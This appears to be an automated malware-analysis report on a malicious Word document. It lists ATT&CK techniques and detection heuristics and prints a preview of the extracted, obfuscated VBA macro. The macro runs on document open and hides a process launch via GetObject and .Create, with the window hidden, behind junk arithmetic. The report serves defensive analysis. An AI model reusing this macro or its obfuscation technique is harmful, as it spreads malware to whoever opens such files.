Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro. The 'autoopen' subroutine and the 'GetObject' call indicate that the macro is designed to execute code upon opening. The ClamAV detection 'Doc.Malware.Sagent-6913531-0' further confirms its malicious nature. The macro's obfuscated nature and the presence of legacy WordBasic markers suggest a downloader or dropper functionality, aiming to fetch and execute additional malicious content.
Heuristics (7)
- ClamAV: Doc.Malware.Sagent-6913531-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Sagent-6913531-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 93a8c2059aec7a6cbae3b1e0c8ea5cf5cdd6feab79a5d130030daa918559929c) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15247 bytes |

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "RGBAAAAU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "DAA1ok"
Attribute VB_Base = "0{11FA3F82-E4B5-405F-8EF2-A4EDC6C8FC4B}{81C5608A-D405-4E84-B25C-572AAB77D8F6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "pQAQDo"
Attribute VB_Base = "0{1520CBA6-5B12-4DEF-90AA-4EC9A8D830B1}{58021442-A172-4850-9D48-B54A75136315}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "oCxCAA_"
Sub autoopen()
On Error Resume Next
Select Case f1UCAk
Case 30729869
zAXDAU = rGccUAZ1 / 511421431 / wBG4QQ - CInt(l1BU1UGA + CInt(599861014)) + (460800255 * CLng(569138753))
iBAAAA = 195896279 * ikAUDG
i1GZAQc = 279786515 - 694194166 + 602328881 - uBCwkD / NX_UBQ - Tan(624451200)
End Select
Select Case RXkoUAA
Case 402484054
fBB4AB = vQDAAGG / 83132355 / dAAZwB - CInt(ZAAAAB + CInt(628707835)) + (483055777 * CLng(182328249))
IAkDDAQc = 587794109 * K4B4BUD
AxDDAcB = 503059722 - 813161423 + 125186588 - H1A1ADc / rcXAUAwG - Tan(713845945)
End Select
Select Case oooXA4Z
Case 76390910
jXxA4A = TQAcAcUk / 469545881 / aBAA4AxQ - CInt(WQcBAQA1 + CInt(986411662)) + (857080194 * CLng(100735099))
r4AADoA = 216482113 * JAADUA
rC1CxBU = 868660489 - 193571284 + 137240318 - XQoDAXQ / u4_1BQG1 - Tan(416758353)
End Select
Set LUQcCA = GetObject(DAA1ok.i_AXBZ.Value + pQAQDo.i4QUAXAA + DAA1ok.i_AXBZ.Value)
Select Case LkAADAZ
Case 515707983
OA_x41c = ScDAk4 / 366699878 / wAZcwU - CInt(ZDUBcB1 + CInt(616176147)) + (605790561 * CLng(789832949))
CBQGAA4 = 149275485 * qcAwQAA
DAxAAAG = 371669840 - 148349073 + 786320384 - pUAAAUA / p44BQU - Tan(116146202)
End Select
Select Case CUB1ADx
Case 508389401
dQAQxAQ = FAQoXCDA / 502539082 / mkDGGA - CInt(LAAAxxAx + CInt(321087531)) + (145879321 * CLng(144222392))
BBA_ZZ = 374510205 * BZ_1AA_
kCA1QG = 88334532 - 511860673 + 853151872 - mXDADUQX / pxDBwA - Tan(604233999)
End Select
Select Case O1cDBx1
Case 328639229
uwX_kAG = CcA1AA / 750419241 / KAcAXxDA - CInt(SwB4A_ + CInt(934810938)) + (933717538 * CLng(956493763))
pUQAQ_Bc = 223803086 * PZkBZAxA
K4ABXD = 675409686 - 834898774 + 813919029 - AcUX_AGB / AAQADZ - Tan(916604516)
End Select
LUQcCA.ShowWindow = 135285 - 135285
Select Case iAA44BA
Case 41413412
C4A4AAA = YUx4oCU1 / 217733306 / dAGCAo - CInt(ZABwQC_Q + CInt(426115382)) + (543656623 * CLng(805127081))
wAUXBA = 925849930 * O4__BA
RAAkQD4X = 506457556 - 638540257 + 415989227 - mUZx4AcQ / tA1DAQ - Tan(65852886)
End Select
Select Case zCACDQXX
Case 875433556
oxAC_BQB = woUBkAo1 / 411022368 / DkcQBA - CInt(DAAZDC1B + CInt(788662900)) + (970260250 * CLng(242362408))
zAcDADA_ = 322187527 * hZUADXA
CCAQDA = 605945070 - 824520757 + 224725002 - IxUkDc / pwAAAc - Tan(849092343)
End Select
Select Case kC_BAUAX
Case 241966075
f41XQcZ = BAxAco / 397980961 / v14A4Z - CInt(wBDAxQXX + CInt(45678294)) + (445330008 * CLng(51758469))
rBA1oc = 944665992 * w1AAA_C
qAAxGQAx = 199459017 - 827069177 + 144851448 - SBBDUGZ / VBUAAAc - Tan(197569888)
End Select
GetObject(DAA1ok.i_AXBZ.Value + pQAQDo.lCADAcBU + DAA1ok.i_AXBZ.Value) _
.Create DAA1ok.i_AXBZ.Value + pQAQDo.IAAUCQ + DAA1ok.i_AXBZ.Value + pQAQDo.JAwUCkAA + DAA1ok.i_AXBZ.Value + DAA1ok.i_AXBZ.Value + pQAQDo.hABw_4 + DAA1ok.i_AXBZ.Value + DAA1ok.i_AXBZ.Value + pQAQDo.KA4kCZD + DAA1ok.i_AXBZ
... (truncated)